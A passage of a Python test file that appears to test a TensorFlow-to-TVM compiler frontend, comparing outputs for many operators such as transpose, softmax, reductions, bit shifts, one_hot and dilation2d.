def _test_l2_normalize(ishape, eps, axis):
""" testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_tranapose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
_test_forward_tranapose_axes_input((2, 3, 4), (1, 2, 0))
_test_forward_tranapose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax """
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square """
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp """
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan """
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1 """
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign """
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint """
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg """
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
""" One iteration of dilation2d with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
